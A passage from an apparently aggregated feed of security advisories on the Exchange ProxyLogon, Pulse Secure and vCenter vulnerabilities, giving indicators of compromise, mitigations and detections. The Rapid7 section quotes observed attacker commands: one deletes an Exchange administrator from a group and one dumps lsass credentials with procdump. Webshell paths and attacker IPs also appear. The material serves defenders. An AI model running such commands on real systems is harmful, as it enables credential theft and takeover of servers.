recommends that everyone running Microsoft Exchange apply these patches immediately as they are being exploited in the wild by a sophisticated adversary.**\n\n## **Technical Analysis of Attacker Activity**\n\n 1. Automated scanning to discover vulnerable Exchange servers from the following DigitalOcean IP addresses:\n * 165.232.154.116\n * 157.230.221.198\n * 161.35.45.41\n\n2\\. Analysis of Internet Information Services (IIS) logs shows a POST request is then made from the scanning DigitalOcean IP to multiple paths and files:\n\n * /ecp/y.js\n * /rpc/\n * /owa/auth/signon.aspx\n * /aspnet_client/system_web/&lt;random_name&gt;.aspx\n * IIS Path ex: /aspnet_client/system_web/TInpB9PE.aspx\n * File system path ex: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\TInpB9PE.aspx\n * /aspnet_client/aspnet_iisstart.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_iisstart.aspx\n * /aspnet_client/aspx_client.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_client.aspx\n * /aspnet_client/aspnet.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspnet.aspx\n\nIn some cases, additional dynamic link libraries (DLLs) and compiled aspx files are created shortly after the webshells are first interacted with via POST requests in the following locations:\n\n * C:\\Windows\\Microsoft.NET\\Framework64\\&lt;version&gt;\\Temporary ASP.NET Files\\root\\\n * C:\\Windows\\Microsoft.NET\\Framework64\\&lt;version&gt;\\Temporary ASP.NET Files\\owa\\\n\n3\\. Next, a command executes, attempting to delete the \u201cAdministrator\u201d from the \u201cExchange Organization administrators\u201d group:\n\n * cmd /c cd /d C:\\\\\\inetpub\\\\\\wwwroot\\\\\\aspnet_client\\\\\\system_web&amp;net group \"Exchange Organization administrators\" administrator /del /domain&amp;echo [S]&amp;cd&amp;echo [E]\n\n4\\. With the command executed, and the webshell successfully uploaded, interaction with the webshell will begin from a different IP. \n\n * We have monitored interaction from 45.77.252[.]175\n\n5\\. Following the POST request, multiple commands are executed on the asset:\n\na. Lsass.exe dumping using procdump64.exe and C:\\Temp\\update.exe \n(MD5:[ f557a178550733c229f1087f2396f782](<https://www.virustotal.com/gui/file/173ac2a1f99fe616f5efa3a7cf72013ab42a68f7305e24ed795a98cb08046ee1/detection>)):\n\n * cmd /c cd /d C:\\\\\\root&amp;procdump64.exe -accepteula -ma lsass.exe lsass.dmp&amp;echo [S]&amp;cd&amp;echo [E]\n\nb. Reconnaissance commands:\n\n * whoami.exe\n * ping.exe\n * tasklist.exe\n * quser.exe\n * query.exe\n\n****Indicators Of Compromise (IOCs)****\n\nType | Value \n---|--- \nIP Address | 165.232.154.116 \nIP Address | 157.230.221.198 \nIP Address | 161.35.45.41 \nIP Address | 45.77.252.175 \nIP Address | 104.248.49[.]97 \nIP Address That Interacts with Uploaded Webshells | 194.87.69[.]35 \nURL | /ecp/y.js \nURL | /ecp/DDI/DDIService.svc/GetList \nURL | /ecp/DDI/DDIService.svc/SetObject \nURL | /owa/auth/errorEE.aspx \nURL | /owa/auth/logon.aspx \nURL | /owa/auth/errorFE.aspx \nURL | /aspnet_client/aa.aspx \nURL | /aspnet_client/iis \nURL | /iistart.aaa \nURL | /owa/iistart.aaa \nUser Agent | python-requests/2.25.1 \nUser Agent | antSword/v2.1 \n \n## **References**\n\n * <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>\n * <https://github.com/microsoft/CSS-Exchange/tree/main/Security>\n\n## Update: March 7, 2021\n\nMicrosoft [published tools](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) to help identify servers potentially compromised by [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). Upon review of the checks within the tools, Rapid7 identified the following additional pre-existing detections within InsightIDR\u2019s Attacker Behavior Analytics that would have alerted customers to this malicious actor in their environment:\n\n * Attacker Technique - PowerShell New-MailboxExportRequest (Created March 14, 2019)\n * Attacker Technique - PowerShell Remove-MailboxExportRequest (Created Dec. 15, 2020)\n * Attacker Technique - Compressing Mailbox With 7zip (Created Dec. 15, 2020)\n * Attacker Technique - PowerShell Download Cradles (Created Jan. 3, 2019)\n\nThese previously existing detections are based on observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response, and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration across the Detection and Response practice, we help ensure our clients continue to have coverage for the latest techniques being used by malicious actors.\n\n## Update March 18, 2021\n\nWidespread [exploitation of vulnerable on-premises Exchange servers](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) is ongoing. Microsoft has released a \"One-Click Exchange On-premises Mitigation Tool\" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended \"to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\" They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n_We'd like to extend a huge thank-you to everyone who helped contribute to this blog post: _\n\n * _Robert Knapp_\n * _Shazan Khaja_\n * _Lih Wern Wong _\n * _Tiffany Anders _\n * _Andrew Iwamaye _\n * _Rashmi Joshi_\n * _Daniel Lydon_\n * _Dan Kelly_\n * _Carlo Anez Mazurco_\n * _Eoin Miller_\n * _Charlie Stafford_\n * _The Rapid7 MVM Team_", "cvss3": {}, "published": "2021-03-03T00:41:04", "type": "rapid7blog", "title": "Rapid7\u2019s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T00:41:04", "id": "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "href": "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-21T20:51:08", "description": "\n\nOn Tuesday, April 20, 2021, security firm FireEye [published detailed analysis](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) of multiple threat campaigns targeting Ivanti\u2019s Pulse Connect Secure VPN. According to FireEye\u2019s analysis, threat actors have been leveraging multiple techniques to bypass single- and multi-factor authentication on Pulse Secure VPN devices, establish persistence across updates, and maintain access via webshells. The focus of the analysis is on threats to U.S. defense networks, but Pulse Secure devices are also a [perennially popular target for exploitation](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>) across a broad range of organizations\u2019 networks.\n\nWhile some of the intrusions FireEye is tracking were attributed to exploitation of older Pulse Secure vulnerabilities, threat actors have evidently also been using [CVE-2021-22893](<https://attackerkb.com/topics/PqQGYGwWdM/cve-2021-22893>), a previously unknown zero-day vulnerability, in combination with older vulns to harvest credentials, move laterally within target environments, and persist using legitimate but modified Pulse Secure binaries and scripts on VPN appliances. For full findings of FireEye\u2019s investigation, including an extensive list of IOCs and ATT&amp;CK techniques, we highly recommend reading their blog post [here](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>).\n\n## Actively exploited zero-day: CVE-2021-22893\n\nPulse Secure released [an out-of-band security advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>) Tuesday on CVE-2021-22893, a critical authentication bypass that allows remote, unauthenticated attackers to execute arbitrary code. The vulnerability **affects versions 9.0R3 and higher** of Pulse Connect Secure devices and carries a CVSSv3 base score of 10. There is no patch available\u2014FireEye\u2019s post indicated a \u201cfinal\u201d patch will be released in May\u2014but Pulse Secure released a workaround (detailed below), and Ivanti\u2019s PSIRT released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) that allows administrators to verify the PCS Image installed on Virtual or Hardware Appliances, check the integrity of the file system, and identify additional or modified files.\n\nAccording to [Pulse Secure\u2019s advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>), older versions of Pulse Connect Secure are not affected by CVE-2021-22893, but it bears mentioning that those running older Pulse Secure devices may be affected by several other high-profile vulnerabilities that have seen broad, sustained exploitation over the past two years (e.g., [CVE-2019-11510](<https://attackerkb.com/topics/lx3Afd7fbJ/cve-2019-11510?referrer=blog>), [CVE-2019-11539](<https://attackerkb.com/topics/9xmWr9M5KE/cve-2019-11539?referrer=blog>)).\n\n## Guidance\n\nPulse Secure has issued a workaround in the form of an XML file that mitigates CVE-2021-22893 until a more permanent patch is available. Pulse Connect Secure customers should import the `Workaround-2104.xml` file, which blocks access to the Windows File Share Browser and Pulse Secure Collaboration features on the PCS appliance. According to the company\u2019s out-of-band advisory, they are using an existing blocklist feature to disable the URL-based attack. Rapid7 researchers were able to decrypt the blocklist\u2019s URI patterns, which are as follows:\n\n * `^/+dana/+meeting`\n * `^/+dana/+fb/+smb`\n * `^/+dana-cached/+fb/+smb`\n * `^/+dana-ws/+namedusers`\n * `^/+dana-ws/+metric`\n\nIn addition to applying the workaround, customers may want to block these patterns at their network perimeter (requires an inline load balancer capable of performing SSL decryption). Pulse Secure has since updated their advisory with the unencrypted patterns. Customers with shell access to their appliance may run the following command to confirm that the blocklist is in place:\n \n \n for i in {a..e}; do /home/bin/dsget \"/vc0/config/blacklists/patch_2104-$i/content\"; done\n \n\nPulse Connect Secure customers running versions 9.0R3 and up should apply the workaround immediately, without waiting for a regular patch or maintenance cycle to occur. We would also advise running [Ivanti\u2019s Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to examine your Pulse Connect Secure images for files that may have been maliciously altered or added. Given the high likelihood of attacker-compromised credentials, organizations should also consider resetting passwords in their environment. Ivanti recommends reviewing the configuration to ensure no service accounts can be used to authenticate. For more information on Pulse Secure device configuration best practices, see the company\u2019s [knowledge base article here](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB29805/?kA1j0000000Fil5>).\n\n## Rapid7 customers\n\n[InsightVM](<https://www.rapid7.com/products/insightvm>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) customers can assess their exposure to CVE-2021-22893 with [authenticated vulnerability checks](<https://www.rapid7.com/db/vulnerabilities/pulse-secure-pulse-connect-secure-cve-2021-22893/>) released on Tuesday, April 20, 2021. Please note that to ensure the highest degree of accuracy, this check requires [website form credentials](<https://docs.rapid7.com/insightvm/creating-a-logon-for-web-site-form-authentication/>) to authenticate to the `/admin` page of the Pulse Connect Secure server. Customers who aren\u2019t sure whether (or where) Pulse Connect Secure is present in their environment can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to search for network services or operating systems containing \u2018Pulse\u2019 in their name. The Scan Engine has some unauthenticated, versionless fingerprinting capabilities for Pulse Connect Secure that do not provide the accuracy needed for a vulnerability check, but may still give a sense of potential exposure.\n\n#### Not an InsightVM or Nexpose customer? Start a free trial to scan for this vulnerability.\n\n[Get Started](<https://www.rapid7.com/trial/insightvm>)", "cvss3": {}, "published": "2021-04-21T20:10:08", "type": "rapid7blog", "title": "Active Exploitation of Pulse Connect Secure Zero-Day (CVE-2021-22893)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2021-22893"], "modified": "2021-04-21T20:10:08", "id": "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2", "href": "https://blog.rapid7.com/2021/04/21/active-exploitation-of-pulse-connect-secure-zero-day-cve-2021-22893/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-05T16:53:27", "description": "\n\nOn Tuesday, May 25, 2021, VMware published [security advisory VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>), which includes details on CVE-2021-21985, a critical remote code execution vulnerability in the vSphere Client (HTML5) component of vCenter Server (6.5, 6.7, and 7.0) and VMware Cloud Foundation (3.x and 4.x). The vulnerability arises from lack of input validation in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server. Successful exploitation requires network access to port 443 and allows attackers to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. CVE-2021-21985 carries a CVSSv3 base score of 9.8.\n\nWhile there are no reports of exploitation in the wild as of May 26, 2021, defenders may remember that CVE-2021-21972, another critical vCenter Server vulnerability from earlier this year, saw widespread exploitation within a few days of disclosure. It is likely that this latest severe flaw will follow suit, and we strongly recommend patching on an emergency basis, particularly given the increased prevalence of ransomware (whose operators often already have access to corporate networks via phished, leaked, reused, or otherwise stolen credentials). **Edit June 5, 2021:** Exploitation is now occurring in the wild. See AttackerKB for [full technical analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog#rapid7-analysis>).\n\nRapid7 Labs identified roughly 6,000 instances of vCenter Server exposed to the public internet as of May 26, 2021:\n\n\n\n## Recommendations\n\nVMware has a number of resources available for vCenter Server customers looking to understand and address CVE-2021-21985 and other vulnerabilities in this week\u2019s advisory, including a [blog post](<https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html>) and a [supplemental FAQ](<https://core.vmware.com/resource/vmsa-2021-0010-faq>).\n\nOrganizations should update to an unaffected version of vCenter Server immediately, without waiting for their regular patch cycles. Those with emergency patch or incident response procedures should consider invoking them, particularly if their implementations of vCenter Server are (or were recently) exposed to the public internet. If you are unable to patch immediately, VMware has instructions on disabling the Virtual SAN Health Check plugin [here](<https://kb.vmware.com/s/article/83829>). Note that while disabling the plugin may mitigate exploitability, it does not remove the vulnerability.\n\nNetwork administrators should ensure that vCenter Server is not exposed to the internet.\n\nFor [further technical information of CVE-2021-21985](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog#rapid7-analysis>), as well as community assessments of exploitability and attacker value, see AttackerKB. We'll update this blog post with more information as it becomes available.\n\n**Update June 5, 2021:** Multiple community sources have confirmed CVE-2021-21985 is [being exploited in the wild](<https://twitter.com/GossiTheDog/status/1400868390726733831>).", "cvss3": {}, "published": "2021-05-26T18:57:20", "type": "rapid7blog", "title": "CVE-2021-21985: What you need to know about the latest critical vCenter Server vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-05-26T18:57:20", "id": "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "href": "https://blog.rapid7.com/2021/05/26/cve-2021-21985-vcenter-server-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2021-03-16T18:53:05", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065. Microsoft will continue to monitor these threats and provide updated tools and investigation guidance to help organizations defend against, identify, and remediate associated attacks.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T18:44:28", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T18:44:28", "id": "MSRC:ED939F90BDE8D7A32031A750388B03C9", "href": "https://msrc-blog.microsoft.com/2021/03/16/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-29T21:40:29", "description": "Microsoft has received a small number of reports from customers and others about continued activity exploiting a vulnerability affecting the Netlogon protocol (CVE-2020-1472) which was previously addressed in security updates starting on August 11, 2020. If the original guidance is not applied, the vulnerability could allow an attacker to spoof a domain controller account that could be \u2026\n\n[ Attacks exploiting Netlogon vulnerability (CVE-2020-1472) Read More \u00bb](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-10-29T20:02:19", "type": "msrc", "title": "Attacks exploiting Netlogon vulnerability (CVE-2020-1472)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-29T20:02:19", "id": "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "href": "https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nMicrosoft Exchange Server vulnerabilities have been officially patched for five months now. These vulnerabilities are actively exploited by multiple threat actors named DeadRinger. DeadRinger has been affecting the telecommunication industry all around the world. DeadRinger consists of three clusters. The first one includes threat group Softcell which has been active since 2012. The Naikon group, which has been active since 2020, is the second cluster. We discovered that the signatures match those of TG-3390, making it the third cluster.\n\nAs a response, Hive Pro Threat Researchers advises that you address these vulnerabilities.\n\nThe Techniques used by the DeadRinger includes: \nT1592: Gather Victim Host Information \nT1595: Active Scanning \nT1590: Gather Victim Network Information \nT1190: Exploit Public-Facing Application \nT1059: Command and Scripting Interpreter \nT1047: Windows Management Instrumentation \nT1059.001: Command and Scripting Interpreter: PowerShell \nT1505.003: Server Software Component: Web Shell \nT1136: Create Account \nT1053: Scheduled Task/Job \nT1078: Valid Accounts \nT1574: Hijack Execution Flow \nT1027.005: Obfuscated Files or Information: Indicator Removal from Tools \nT1027: Obfuscated Files or Information \nT1036: Masquerading \nT1070.006: Indicator Removal on Host: Timestomp \nT1140: Deobfuscate/Decode Files or Information \nT1040: Network Sniffing \nT1087: Account Discovery \nT1018: Remote System Discovery \nT1071.001: Application Layer Protocol: Web Protocols \nT1041: Exfiltration Over C2 Channel \nT1021.002: Remote Services: SMB/Windows Admin Shares \nT1550.002: Use Alternate Authentication Material: Pass the Hash \nT1105: Ingress Tool Transfer \nT1555: Credentials from Password Stores \nT1003: OS Credential Dumping \nT1016: System Network Configuration Discovery \nT1069: Permission Groups Discovery \nT1560: Archive Collected Data \nT1569: System Services \nT1543.003: Create or Modify System Process: Windows Service \nT1574.002: Hijack Execution Flow: DLL Side-Loading \nT1570: Lateral Tool Transfer \nT1056.001: Input Capture: Keylogging \nT1573: Encrypted Channel\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 47.56.86[.]44 \n45.76.213[.]2 \n45.123.118[.]232 \n101.132.251[.]212 \nSHA-1 Hash | 19e961e2642e87deb2db6ca8fc2342f4b688a45c \nba8f2843e2fb5274394b3c81abc3c2202d9ba592 \n243cd77cfa03f58f6e6568e011e1d6d85969a3a2 \nc549a16aaa9901c652b7bc576e980ec2a008a2e0 \nc2850993bffc8330cff3cb89e9c7652b8819f57f \n440e04d0cc5e842c94793baf31e0d188511f0ace \ne2340b27a4b759e0e2842bfe5aa48dda7450af4c \n15336340db8b73bf73a17c227eb0c59b5a4dece2 \n5bc5dbe3a2ffd5ed1cd9f0c562564c8b72ae2055 \n0dc49c5438a5d80ef31df4a4ccaab92685da3fc6 \n81cfcf3f8213bce4ca6a460e1db9e7dd1474ba52 \ne93ceb7938120a87c6c69434a6815f0da42ab7f2 \n207b7cf5db59d70d4789cb91194c732bcd1cfb4b \n71999e468252b7458e06f76b5c746a4f4b3aaa58 \n39c5c45dbec92fa99ad37c4bab09164325dbeea0 \nefc6c117ecc6253ed7400c53b2e148d5e4068636 \na3c5c0e93f6925846fab5f3c69094d8a465828e9 \na4232973418ee44713e59e0eae2381a42db5f54c \n5602bf8710b1521f6284685d835d5d1df0679b0f \ne3fcda85f5f42a2bffb65f3b8deeb523f8db2302 \n720556854fb4bcf83b9ceb9515fbe3f5cb182dd5 \nb699861850e4e6fde73dfbdb761645e2270f9c9a \n6516d73f8d4dba83ca8c0330d3f180c0830af6a0 \n99f8263808c7e737667a73a606cbb8bf0d6f0980 \na5b193118960184fe3aa3b1ea7d8fd1c00423ed6 \n92ce6af826d2fb8a03d6de7d8aa930b4f94bc2db \nd9e828fb891f033656a0797f5fc6d276fbc9748f \n87c3dc2ae65dcd818c12c1a4e4368f05719dc036 \nDomain | Cymkpuadkduz[.]xyz \nnw.eiyfmrn[.]com \njdk.gsvvfsso[.]com \nttareyice.jkub[.]com \nmy.eiyfmrn[.]com \nA.jrmfeeder[.]org \nafhkl.dseqoorg[.]com \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>\n\n#### References\n\n<https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos>\n\n<https://www.zdnet.com/article/deadringer-chinese-apts-strike-major-telecommunications-companies/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T11:01:05", "type": "hivepro", "title": "Have you patched the vulnerabilities in Microsoft Exchange Server?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-08-18T11:01:05", "id": "HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "href": "https://www.hivepro.com/have-you-patched-the-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2021-03-15T22:39:29", "description": "Co-authored by Ryan Barnett.\n\n### AppSec Protections for Microsoft Exchange CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065\n\nOn March 2, 2021, the Microsoft Security Response Center alerted its customers to [several critical security updates](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to Microsoft Exchange Server, addressing vulnerabilities currently under attack. \n\nThe United States Computer Emergency Readiness Team Cybersecurity and Infrastructure Security Agency also issued an [alert with recommendations](<https://us-cert.cisa.gov/ncas/alerts/aa21-062a>) on how to mitigate the vulnerabilities. \n\n * [CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>) allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information.\n * [CVE-2021-26857](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26857>), [CVE-2021-26858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26858>), and [CVE-2021-27065](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27065>) allow for remote code execution.\n * CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server. \n\n * CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server\n * To locate a possible compromise of these CVEs, we encourage you to read the [Microsoft Advisory](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\n### How Akamai Can Help \n\n\nCustomers that use Akamai Web Application Firewall solutions, Kona Site Defender and Web Application Protector, with the Automated Attack Groups engine have received an automatic update for protection. Akamai recommends that customers using Automated Attack Groups set all their attack groups, but specifically the Web Platform Attack Group, to Deny to prevent these exploitation attempts.\n\nKona Site Defender customers using Kona Rule Set (KRS) should update their profile and enable newly released rules ID 3000083 and 3000084 in the Total Request Score (Inbound) attack group in order to protect against attempts to exploit the following CVEs:\n\n * CVE-2021-26855, which is the SSRF vulnerability\n * CVE-2021-27065, which is being used to upload webshells\n\n**Akamai recommends that either the attack group or the individual KRS rules be put into Deny mode to protect against attempts to exploit these vulnerabilities.**\n\nAkamai's research and intelligence teams observed that attackers have been quick to automate their target identification and exploitation attempts. A variety of existing controls in Akamai's security portfolio are designed to detect these attempts:\n\n 1. Web Application Firewall \\-- Rate Controls, TOR IP Blocklist, and Penalty Box are all also detecting and blocking this scanning traffic\n 2. Client Reputation \\-- the \"Web Scanner\" and \"Web Attacker\" categories are identifying many attackers searching for vulnerable targets\n 3. Bot Management \\-- controls detect the incoming traffic to be automated or from anonymous proxies\n\nIf you have any questions, please reach out to Akamai Support Services or your account team.\n\n## Global Attack Intelligence\n\nOver the last 48 hours on our global platform we have observed:\n\n * 290,000 unique attempts to scan and/or exploit these vulnerabilities\n * 952 unique IPs involved in these attempts \n * 731 of these unique IPs were identified by Akamai Client Reputation threat intelligence as known web scanners or web attackers with a median score of 9.6 out of 10\n * 23,910 unique hosts targeted\n * 80% of attack activity targeted against Commerce, High-Tech, Financial Services, and Manufacturing verticals\n * 90% of all attack attempts targeted against organizations in the United States, Austria, India, Canada, Germany, France and the United Kingdom\n * Assetnote and Qualys were the top two known scanners\n\n[  ](<https://blogs.akamai.com/Microsoftblog2.png>) **Figure**: Attack sources; the top number represents the number of requests and the bottom number represents the number of IPs\n\n## Conclusion and Recommended Steps\n\nWe've confirmed active attempts of exploitation of Microsoft Exchange/Outlook Web Access zero-day vulnerabilities.\n\nSuccessful exploitation allows an unauthenticated attacker to execute arbitrary code and install webshells on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system.\n\nMitigation and remediation can be achieved by following these steps:\n\n 1. Akamai customers that have Exchange/Outlook Web Access protected by either Kona Site Defender using the Automated Attack Groups rule set or the Web Application Protector product have already received an automatic update to the Platform Attacks Group. Kona Site Defender customers that are using the Kona Rule Set, however, need to take steps to activate the new rules to receive protection.\n 2. Customers should also 